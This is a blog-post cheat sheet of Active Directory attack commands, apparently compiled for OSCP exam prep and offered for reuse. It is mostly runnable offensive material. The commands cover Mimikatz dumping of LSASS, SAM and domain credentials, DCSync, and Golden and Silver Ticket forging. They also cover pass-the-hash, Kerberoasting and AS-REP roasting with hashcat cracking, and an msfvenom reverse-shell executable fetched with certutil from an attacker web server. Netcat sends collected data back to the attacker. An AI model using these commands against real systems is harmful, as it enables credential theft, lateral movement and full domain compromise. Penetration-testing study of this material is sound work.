Active Directory Attack Cheat Sheet

Do you struggle remembering the loads of different active directory attacks and enumeration vectors? Me too.. I’ll tell you a secret though: most penetration testers don’t remember everything off the top of their heads, they’re just really good at Googling things and usually have their own personal cheat sheets.

Essentially, this post is mostly going to be the clusterfuck of AD info I gathered while prepping for my OSCP exam. It doesn’t cover everything and anything related to AD, I don’t go into detail and explain every type of attack, I’m literally just pasting and reformatting the exact cheat sheet I used on my exam. This isn’t intended to be any sort of tutorial, just something that was (and is currently) helpful for me. Nothing I came across in the exam wasn’t on this sheet (did you like the double negative?). There’s no specific order to it, so I’d recommend taking it all and pasting it into your own OneNote or whatever you use and build off of it.

Quick disclaimer: any of the tools that are in the impacket directory can be ran as a binary rather than having to cd or specify their paths. i.e. instead of “/usr/share/doc/python3-impacket/examples/GetUserSPNs.py” you can just type “impacket-GetUserSPNs” and it should work. I can’t remember if I had to do tinkering to get it to work like that, I’m pretty sure it worked on a fresh install of Kali, so try it out.. If it doesn’t work let me know and I’ll see what I can do to help.

Most of the ‘good stuff’ that I use is in the last section — Remote AD Enumeration/Attacks.

Enumeration Cheat Sheets

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse

Attack Privilege Requirements

Kerbrute Enumeration — No domain access required
Pass the Ticket — Access as a user to the domain required
Kerberoasting — Access as any user required
AS-REP Roasting — Access as any user required
Golden Ticket — Full domain compromise (Domain Admin) required
Silver Ticket — Service hash required
Skeleton Key — Full domain compromise (Domain Admin) required

Practicing AD Attacks

https://tryhackme.com/room/attacktivedirectory
https://tryhackme.com/room/activedirectorybasics
https://tryhackme.com/room/postexploit
https://tryhackme.com/room/attackingkerberos
https://tryhackme.com/room/zer0logon
https://tryhackme.com/room/vulnnetroasted
https://tryhackme.com/room/enterprise
https://tryhackme.com/room/adenumeration
https://tryhackme.com/room/exploitingad
– HTB: Forest, Sauna, Active, Monteverde, Sizzle, Cascade

Bloodhound

One of the best tools for AD enumeration. Use it in conjunction with SharpHound.exe on target to grab a visual representation of the domain. Also has some useful pre-built queries to identify the best path to Domain Admin, who is kerberoastable, etc.

BloodHound Tutorial:
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

SharpHound Tutorial:
https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html

SharpHound (exe or ps1) downloads:
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

Bloodhound Cheatsheet:

[Attack Box] neo4j console [to start backend service]
Enter creds [from initial setup]

Transfer SharHound (exe or ps1) and nc.exe to target

Run SharpHound.exe or .ps1

Transfer loot back to kali:
- On $LHOST: nc -nlvp 4321 > loot.zip
- On target: nc.exe -nv <kali IP> 4321 < loot.zip
- Drag loot.zip into BloodHound GUI

Mimikatz.exe

Mimikatz.exe is a tool that allows you to extract passwords stored in memory and perform some AD attacks (PTT, etc). Obviously at least need a low-priv user, but it usually only works as an Administrator or SYSTEM. Just transfer it to target and run the binary.

https://www.liquidweb.com/kb/how-to-install-and-use-mimikatz/
https://github.com/gentilkiwi/mimikatz/releases

Sometimes older systems require an older version of Mimikatz.exe, version 2.1.1:
https://gitlab.com/kalilinux/packages/mimikatz/-/tree/d72fc2cca1df23f60f81bc141095f65a131fd099/

Always start Mimikatz.exe session by entering:

privilege::debug
token::elevate

When I run mimikatz I usually try to run most of the below commands, or at least will dump LSASS, dump SAM, and dump secrets.

Mimikatz.exe Cheat Sheet:

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys

#Dump SAM Database
mimikatz lsadump::sam

#Dump SECRETS Database
mimikatz lsadump::secrets

#Inject and dump the Domain Controller’s Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the Domain’s Credentials without touching DC’s LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#List and Dump local kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list

Kerberoasting:
https://stealthbits.com/blog/extracting-service-account-passwords-with-kerberoasting/
https://medium.com/@markmotig/kerberoasting-from-setup-to-cracking-3e8c980f26e8

Pass-The-Ticket (PTT):
PTT works by dumping the TGT from the LSASS memory of the machine. LSASS is a memory process that stores credentials on an active directory server and can store Kerberos tickets along with other credential types. When you dump the ticket with Mimikatz it will give you a .kirbi ticket which can be used to gain domain admin if a domain admin ticket is in LSASS memory. Great attack for privilege escalation and lateral movement.

mimikatz.exe

privilege::debug

sekurlsa::tickets /export [this will export all of the .kirbi tickets into your present working directory]

Always look for an administrator@krbtgt ticket if possible.

Now to pass the ticket:

kerberos::ptt <.kirbi ticket>

klist [not in mimikatz session — verifies your ticket was injected]

Golden Ticket Attack:
This attack works by dumping the TGT of any user on the domain, this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket you would dump any service or domain ticket.

mimikatz.exe

privilege::debug
lsadump::lsa /inject /name:krbtgt [to create a silver ticket change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account]

kerberos::golden /user:administrator /domain:<domain.local> /sid:<krbtgt’s full SID> /krbtgt:<NTLM Hash of krbtgt> /id:500 [to create a silver ticket user a different service account — place the NTLM, SID, and id 1103 into the proper slots of this command]

To access other machines with the Golden/Silver ticket:

misc::cmd [to spawn cmd.exe instance for your new ticket]

dir \\<other machine name or IP>\C$

MSFVenom Reverse Shell (.exe)

Nothing special to this. I just liked having it handy.

msfvenom -a x64 — platform Windows -p windows/x64/shell_reverse_tcp LHOST=<Local IP>LPORT=4321 -f exe -o rev.exe

[If this doesn't work try windows/x64/shell/reverse_tcp as the payload; or remove x64 if it's a 32-bit box]

File Transfer (From Target)

On localhost, start webserver from location in which the file you want to transfer is in:

python3 -m http.server 8080

On target, enter this command:

certutil.exe -urlcache -split -f http://<your IP>:<web port>/<requested file>

example: certutil.exe -urlcache -split -f http://1.2.3.4:8080/rev.exe

Start PowerShell Session And Import Module

powershell.exe -nop -exec bypass

Import-Module <Full Path to xyz.ps1>

PowerView.ps1

PowerView is a super powerful PowerShell script that helps with domain enumeration. Also can perform certain attacks like kerberoasting. It does too much to type. I’ll usually just follow some PowerView guides online.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Invoke-Kerberoast [Super nice when it works]

http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/

Connect To Host w/ Found/Cracked Creds

python3 /opt/impacket/examples/psexec.py <domain>/<username>:<password>@<IP>

or

impacket-psexec.py <domain>/<username>:<password>@<IP>

example:

impacket-psexec.py my.domain/luke:skywalk3r@1.2.3.4

If you have creds/hashes to the target, use crackmapexec to request the reverse shell, and again to execute it.

For the first command, change the ‘rev.exe’ section in the picture below to:

certutil.exe -urlcache -split -f http://<localhost>:<web port>/rev.exe

then run your modified version of the command below (make sure you were hosting a web server for rev.exe, and make sure you have an nc listener for the shell):

kerbrute

Kerbrute is a popular enumeration tool used to brute force and enumerate valid active directory users by abusing Kerberos pre-authentication. I like to start username enumeration with the below wordlist, but hopefully I can grab legit usernames through LDAP enumeration or enum4linux. If so, I’ll create a user list based on those names and use kerbrute to verify they actually exist.

kerbrute binary:
https://github.com/ropnop/kerbrute/releases

Wordlist:
https://github.com/jeanphorn/wordlist/blob/master/usernames.txt

[Add DC (or hostname) DNS name and IP to /etc/hosts file]
./kerbrute userenum --dc <hostname.local> -d <domain name> <path to user-wordlist>

Rubeus

Good tool for harvesting TGTs and conducting various attacks. Transfer it to the target to run it.

rubeus binary:
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe

Harvest TGTs every 30 seconds:

rubeus.exe harvest /interval:30

Kerberoasting:

rubeus.exe kerberoast

[copy the hash to your attack box into a file — we’ll call it hash.txt]

hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting:
Similar to kerberoasting, AS-REP roasting dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike kerberoasting, these users do not have to be service accounts; the only requirement to be able to AS-REP roast a user is that the user must have pre-authentication disabled.

rubeus.exe asreproast /format:hashcat /outfile:<filename of choice>

[save hash to file on attack box — we’ll call it hash.txt]

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt

Remote AD Enumeration/Attacks

This section is my bread and butter. 90% of the stuff I do/use comes from this section. It all boils to enumeration: use enum4linux/ldapsearch to initially see if you can find users/info, then put those users into a list and/or use kerbrute/impacket-lookupsid to find more/verify the found users, then just run through the rest of the commands and hope to get a hash back, crack it, then move onto the password-required tools, then re-run through all the tools as the new user/password. Pretty cut and dry.

Enumerate port 139/445 with enum4linux:

enum4linux -v <IP>

Enumerate LDAP w/ ldapsearch:

ldapsearch -x -h <IP> -s base namingcontexts

Parse through the returned naming contexts, then enumerate each one:

ldapsearch -x -h <IP> -b ‘DC=EGOTISTICAL-BANK,DC=LOCAL’

You can further query specific sections of each naming context:

ldapsearch -h <IP> -x -b “DC=cascade,DC=local” ‘(objectClass=person)’

Search through the output and see if you can identify interesting parameters. You may be able to create a user list based on the output. You might get lucky and find some sensitive info like passwords. Try piping the command grep and grepping for pass, pwd, password, domain, user, etc..

Enumerate users via Kerbrute:

[add domain name to /etc/hosts file]

./kerbrute userenum --dc <dc IP/hostname> -d <domain.local> <user list>

You can also enumerate users with crackmapexec’s –users option if you have creds.

If kerbrute doesn’t work, try impacket-lookupsid

impacket-lookupsid <domain.local>@<DC IP>

If you manual enumeration doesn’t get you a valid list of users try:
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

AS-REPRoasting:

impacket-GetNPUsers <domain.local>/ -no-pass -usersfile <path to users list> -format hashcat [this command can also be used if you find valid creds, might get different results with creds]

[paste hash into a file — users.txt]

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt

Dump password hashes a specific service account has access to (usually requires creds):

impacket-secretsdump <username>:<password>@<domain name or IP> -dc-ip <DC IP>

Use Evil-WinRM or win-pth to connect to host using PTH attack:

evil-winrm -i <IP> -u <user> -H <hash>

When using win-pth you have to append the blank LM hash to the beginning of the user’s hash, I’ll provide a link explaining this.

Blank LM hash (always the same) — Aad3b435b51404eeaad3b435b51404ee

pth-winexe -U <domain>/<user>%<LM hash>:<user hash> //<IP> <command to run>

Example win-pth command:

pth-winexe -U svcorp/pete%aad3b435b51404eeaad3b435b51404ee:0f951bc4fdc5dfcd148161420b9c6207 //10.11.1.21 cmd.exe

https://infinitelogins.com/2020/09/05/popping-remote-shells-pth-winexe-on-windows/
https://yougottahackthat.com/blog/339/what-is-aad3b435b51404eeaad3b435b51404ee

Get User SPNs:

impacket-GetUserSPNs <IP or hostname>/<username>:<password> [add -request if SPN is found]

[save hash and crack with hashcat]

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Decrypt Groups.xml cpassword:
If you find a file on a Windows box named Groups.xml, this is a Group Policy Preferences XML (GPP) file. gpp-decrypt will extract usernames and passwords from it and decrypt it.

python3 gpp-decrypt.py -f <groups.xml file>

OR

python3 gpp-decrypt.py -c <cpassword>

https://github.com/t0thkr1s/gpp-decrypt

Conclusion

That’s it! AD exploitation is pretty simple once you get the hang of it. Having a cheat sheet makes life much easier. When you’re in a time crunch or are feeling brain dead this will make your life so much easier. Feel free to take this and do whatever you want. Add to it, take away from it, reformat it, I don’t care. Hope it helps!

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Dw3113r